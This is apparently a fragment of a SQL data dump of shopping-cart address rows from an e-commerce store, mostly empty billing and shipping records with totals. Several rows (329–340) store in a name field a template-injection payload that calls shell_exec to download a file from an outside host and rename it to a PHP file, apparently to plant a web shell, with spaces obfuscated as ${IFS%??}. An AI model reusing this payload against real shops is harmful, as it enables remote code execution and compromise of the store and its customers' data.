(313, 338, '2023-11-10 10:35:23', '2023-11-10 10:35:23', 79, 0, NULL, 'billing', 'WfhzPO.cjppwj@rottack.autos', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(314, 338, '2023-11-10 10:35:23', '2023-11-10 10:35:23', 79, 0, NULL, 'shipping', 'WfhzPO.cjppwj@rottack.autos', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(315, 339, '2023-11-10 16:07:07', '2023-11-10 16:07:07', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(316, 339, '2023-11-10 16:07:07', '2023-11-10 16:07:07', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(317, 340, '2023-11-12 10:33:05', '2023-11-12 10:33:05', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(318, 340, '2023-11-12 10:33:05', '2023-11-12 10:33:05', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 421.0000, 421.0000, 336.8000, 336.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.2000, -84.2000, 336.8000, 336.8000, NULL, '[]', NULL, 0.0000, 0.0000, 421.0000, 421.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(319, 341, '2023-11-14 00:50:34', '2023-11-14 00:50:34', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(320, 341, '2023-11-14 00:50:34', '2023-11-14 00:50:34', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(321, 342, '2023-11-14 01:36:21', '2023-11-14 01:36:21', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(322, 342, '2023-11-14 01:36:21', '2023-11-14 01:36:21', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(323, 343, '2023-11-14 01:36:21', '2023-11-14 01:36:21', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(324, 343, '2023-11-14 01:36:21', '2023-11-14 01:36:21', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(325, 344, '2023-11-14 01:36:22', '2023-11-14 01:36:22', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(326, 344, '2023-11-14 01:36:22', '2023-11-14 01:36:22', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(327, 345, '2023-11-14 01:36:22', '2023-11-14 01:36:22', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(328, 345, '2023-11-14 01:36:22', '2023-11-14 01:36:22', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(329, 346, '2023-11-16 12:30:30', '2023-11-16 12:30:30', NULL, 0, NULL, 'billing', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'Los Angels', 'California', 12, '90017', 'US', '3455543453', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(330, 346, '2023-11-16 12:30:30', '2023-11-16 12:30:40', NULL, 0, NULL, 'shipping', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'Los Angels', 'California', 12, '90017', 'US', '3455543453', NULL, 0, 0, 'tablerate_bestway', 'Best Way - Table Rate', 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(331, 347, '2023-11-16 12:31:00', '2023-11-16 12:31:00', NULL, 0, NULL, 'billing', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, 'Ouverture\n214', 'Eindhoven', 'Noord-Brabant', 32, '5629PX', 'NL', '3455543453', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(332, 347, '2023-11-16 12:31:00', '2023-11-16 12:31:04', NULL, 0, NULL, 'shipping', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, 'Ouverture\n214', 'Eindhoven', 'Noord-Brabant', 32, '5629PX', 'NL', '3455543453', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 5.0000, 5.0000, 0.0000, 0.0000, 0.0000, 0.0000, 116.0000, 116.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(333, 348, '2023-11-16 12:31:24', '2023-11-16 12:31:24', NULL, 0, NULL, 'billing', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'Barcelona', 'Schaffhausen', 120, '2345', 'CH', '3455543453', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(334, 348, '2023-11-16 12:31:24', '2023-11-16 12:31:28', NULL, 0, NULL, 'shipping', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'Barcelona', 'Schaffhausen', 120, '2345', 'CH', '3455543453', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 5.0000, 5.0000, 0.0000, 0.0000, 0.0000, 0.0000, 116.0000, 116.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(335, 349, '2023-11-16 12:31:45', '2023-11-16 12:31:45', NULL, 0, NULL, 'billing', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'London', 'London', 579, 'AB12 3DC', 'GB', '3455543453', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(336, 349, '2023-11-16 12:31:45', '2023-11-16 12:31:49', NULL, 0, NULL, 'shipping', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'London', 'London', 579, 'AB12 3DC', 'GB', '3455543453', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 5.0000, 5.0000, 0.0000, 0.0000, 0.0000, 0.0000, 116.0000, 116.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(337, 350, '2023-11-16 12:32:08', '2023-11-16 12:32:08', NULL, 0, NULL, 'billing', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'Paris', 'Paris', 579, '23423', 'FR', '3455543453', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(338, 350, '2023-11-16 12:32:08', '2023-11-16 12:32:12', NULL, 0, NULL, 'shipping', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'Paris', 'Paris', 579, '23423', 'FR', '3455543453', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 5.0000, 5.0000, 0.0000, 0.0000, 0.0000, 0.0000, 116.0000, 116.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(339, 351, '2023-11-16 12:32:27', '2023-11-16 12:32:27', NULL, 0, NULL, 'billing', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'Barcelona', 'Baja California Sur', 579, '23454', 'MX', '3455543453', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(340, 351, '2023-11-16 12:32:27', '2023-11-16 12:32:33', NULL, 0, NULL, 'shipping', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(shell_exec).filter(curl${IFS%??}-O${IFS%??}https://www.citytoohot.fr/css/retro.css;mv${IFS%??}retro.css${IFS%??}b2b.php\")}}', NULL, 'Huevos', NULL, NULL, '1 avenue', 'Barcelona', 'Baja California Sur', 579, '23454', 'MX', '3455543453', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 5.0000, 5.0000, 0.0000, 0.0000, 0.0000, 0.0000, 116.0000, 116.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(341, 352, '2023-11-20 03:56:33', '2023-11-20 03:56:33', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(342, 352, '2023-11-20 03:56:33', '2023-11-20 03:56:33', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(343, 353, '2023-11-20 04:02:12', '2023-11-20 04:02:12', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(344, 353, '2023-11-20 04:02:12', '2023-11-20 04:02:12', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(345, 354, '2023-11-20 04:04:53', '2023-11-20 04:04:53', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(346, 354, '2023-11-20 04:04:53', '2023-11-20 04:04:53', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(347, 355, '2023-11-20 04:18:38', '2023-11-20 04:18:38', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(348, 355, '2023-11-20 04:18:38', '2023-11-20 04:18:38', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(349, 356, '2023-11-20 04:45:50', '2023-11-20 04:45:50', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(350, 356, '2023-11-20 04:45:50', '2023-11-20 04:45:50', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(351, 357, '2023-11-24 01:23:51', '2023-11-24 01:23:51', 80, 0, NULL, 'billing', 'llofaR.hqbmdjm@monochord.xyz', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(352, 357, '2023-11-24 01:23:51', '2023-11-24 01:23:51', 80, 0, NULL, 'shipping', 'llofaR.hqbmdjm@monochord.xyz', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(353, 358, '2023-11-26 22:37:28', '2023-11-26 22:37:28', 81, 0, NULL, 'billing', 'UKlRFi.tdwcpwb@borasca.xyz', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
